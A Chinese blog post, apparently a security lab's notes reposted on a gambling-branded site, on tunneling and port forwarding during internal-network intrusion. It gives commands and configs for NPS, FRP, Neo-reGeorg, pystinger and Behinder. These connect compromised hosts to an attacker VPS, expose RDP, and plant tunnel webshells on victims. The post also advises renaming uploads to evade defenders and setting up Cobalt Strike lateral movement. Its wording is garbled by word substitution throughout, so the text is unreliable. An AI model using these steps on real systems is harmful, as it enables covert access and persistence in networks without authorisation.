mg不朽情缘

84472_17022767220742

征询电话:400-6446-808

新闻动态

创安尝试室专栏丨内网渗入-代理转发笔记
2023-05-05 00:00:00
crop,h_449,w_800,x_0,y_0
171401694838af7ed3fe72e746cb643d-sz_456

 

 

 

 

 

 

 

 

 

 

古语有云:“学如逆水行舟 ,不进则退。”面对如今随时都在变动的网络安全环境更是如此。为此 ,mg不朽情缘微信公家号特开设“创安尝试室专栏” ,以纪录mg不朽情缘创安尝试室在技术上的索求 ,加强同业间的互换 ,相互进建 ,共同进取。

 

?+

+

内网渗入-代理转发笔记

在内网渗入中 ,分为出网和不出网 ,不出网的意思是指标利用服务器与互联网网络不成达 ,选取代理服务或映射web端口用于在互联网上的交互。

NPS(出网)

下载

https://github.com/ehang-io/nps/releases

筹备工作:一台云vps ,作为nps服务端

装置

./nps install      //装置没有权限的话 ,chmod 777 nps

批改配置文件

装置实现后 ,会在/etc/nps/conf目录天生如下配置文件 ,进行配置批改 ,批改默认账户密码 ,预防被攻击利用。

/etc/nps/conf/nps.conf

1684740911230650

运行服务端

会启动一个web服务 ,用配置好的端口 ,账户密码接见。

./nps start        //运行服务端 ,终场./nps stop

1684740912126814

新增客户端

配置压缩和加密 ,削减被攻击危险

1684740912435309
1684740913136841

增长后 ,可查看到客户端配置号令

1684740913576453

上传npc ,运行客户端

./npc -server=47.XX.XX.xxx:8024 -vkey=hmqha8eove21cevu -type=tcp                 //linux npc.exe -server=47.XX.xX.xxx:8024 -vkey=hmqha8eove21cevu -type=tcp

//windows

运行成功后(把稳:低版本npc ,批改为npc1 ,360不拦截 ,火绒会提醒装置拦截)

1684740914491552

客户端显示在线 ,注明能够进行代理了

1684740914106228

socks代理和端口转发

在渗入中常用tcp端口转发来接见内网主机 ,用socks5进行接见内网web服务等。

TCP

69e1a1abdeabe15f6885e074c38096c3

socks5

使用proxifier或浏览器代理插件 ,带入内网接见内部web

d33f3afffaf0d18455264f7352795ae1
f5e06a3681b577c3ebb4c0846293d31b
53f15723a47f342c61e19f8e52b8977f

Frp(出网)

FRP(Fast Reverse Proxy)是一款单一 ,好用 ,不变的隧路工具。FRP 使用Go说话开发 ,它是一款高机能的反向代理利用 ,能够轻松地进行内网穿透 ,对表网提供服务。FRP 支持TCP、UDP、KCP、HTTP、HTTPS等和谈类型 ,并且支持Web服务凭据域名进行路由转发。在进行内网渗入中 ,FRP是常用的一款隧路工具。

下载

https://github.com/fatedier/frp/releases/tag/v0.46.1

2c0ac2780e1aa52ef4b610d280a4a7c1

上传服务端

同时上传批改好的配置文件frps.ini到自己的VPS ,如下进走运行

./frps -c frps.ini

[common]

bind_addr = 0.0.0.0        #绑定的ip ,为本机

bind_port = 17000       #绑定的端口

dashboard_addr = 0.0.0.0       #治理地址

dashboard_port = 27500      #治理端口 ,可视化节造台 ,http接见

dashboard_user = root        #治理的用户名

dashboard_pwd = 1wsdfeew3!@1$#       #治理用户的密码 ,尽量复杂一点 ,安全

token = 1q2w3e       #客户端服务端衔接的密码

heartbeat_timeout = 90       #心跳超不断间

max_pool_count = 5        #最包头时衔接数

上传客户端

在获取到shell时 ,批改文件名称后再上传 ,预防被蓝队发现。

常用端口映射和socks代理

frpc.exe -c frpc.ini

[common]

server_addr = 100.20.14.14

server_port = 17000      #服务器绑定的端口 ,和服务端bind_port对应

token = 1q2w3e      #衔接的密码 ,和服务端对应

pool_count = 5

protocol = tcp      #和谈类型

health_check_type = tcp

health_check_interval_s = 100

#socks代理

[test]

remote_port = 10000    #代理的端口

plugin = socks5    #使用的和谈

use_encryption = true    #是否加密

use_compression = true

#端口映射

[test]

type=tcp

local_ip = 127.0.0.1    #本地ip地址

local_port = 3389    #要映射的本地端口

remote_port = 3389    #要映射的服务端端口

衔接socks5代理端口10000 ,进行查抄是否成功

f5e06a3681b577c3ebb4c0846293d31b

neo-reg(不出网)

Neo-reGeorg 是一个旨在积极沉构 reGeorg 的项目 ,主张是:

● 提高可用性 ,预防特点检测

● 提高 tunnel 衔接安全性

● 提高传输内容保密性

● 应对更多的网络环境场景下使用

1、天生隧路马 ,将隧路顿时传至服务器web目录

python neoreg.py generate -k password

2、使用 neoreg.py 衔接WEB服务器 ,在本地成立socks5代理

python3 neoreg.py -k password -u http://xx/tunnel.php

76886abea9efd6f7c9e8b945f4a6b3f2

3、socks5客户端衔接 ,默认127.0.0.1:1080

a44ecb1e450a288db2f354cedf7cc4bf

pystinger(不出网)

毒刺(pystinger)通过webshell实现内网SOCK4正向代理,端口映射.

可直接用于metasploit-framework,viper,cobalt strike上线.

主体使用python开发,当前支持php,jsp(x),aspx三种代理剧本.

https://github.com/FunnyWolf/pystinger

1、将隧路shell ,服务端上传至受害机

start stinger_server.exe 0.0.0.0      #注:必须设置为0.0.0.0 ,不然无法成功!

2、运行客户端

./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000         #只需代替-w的参数url

3、上线CS机械

在对不出网段中的其他内网主机进行横向移动上线时 ,可执行完以上操作后在CobaltStrike创建一个Listener ,HTTP Hosts填192.168.59.133(即受害机内网IP) ,HTTP Port填60020

76c6769aa10c82db81a57d725542f2c5

冰蝎webshell(不出网)

socks代理的端口不是开在远程服务器上的 ,是开在本地的 ,利用socks客户端直接衔接本地IP的代理端口即可 ,冰蝎会把本地端口的流量通过http隧路透传至远程服务器网络。

内网穿透职能 ,配置socks隧路 ,本地IP、端口代理。

befb4886cf4045f37fc88c65557c229c

E·N·D

 

本文由mg不朽情缘创安尝试室编纂。

本文仅限于幼我进建和技术钻研 ,由于传布、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为 ,均由使用者自己掌管 ,本单元不为此承担任何责任。创安攻防尝试室占有对此文章的批改和诠释权 ,如欲转载或传布此文章 ,必须保障此文章的齐全性 ,蕴含版权申明等全数内容。

 

如有侵权 ,请联系后盾。

 

 

 

创安尝试室

mg不朽情缘创安尝试室 ,是mg不朽情缘旗下的技术钻研团队 ,成立于2021年9月 ,重要钻研红蓝匹涤注沉大安全保险、应急响应等方向。

创安攻防尝试室圆满实现了屡次公安进行的沉要网络安全保险和攻防演习活动 ,并积极参与各类网络安全较量 ,屡获殊荣。

创安攻防尝试室秉承mg不朽情缘的发展理想 ,致力打造国内一流网络安全团队。

 

393a01c9785b81a845fd4ecbcb864fdc
【网站地图】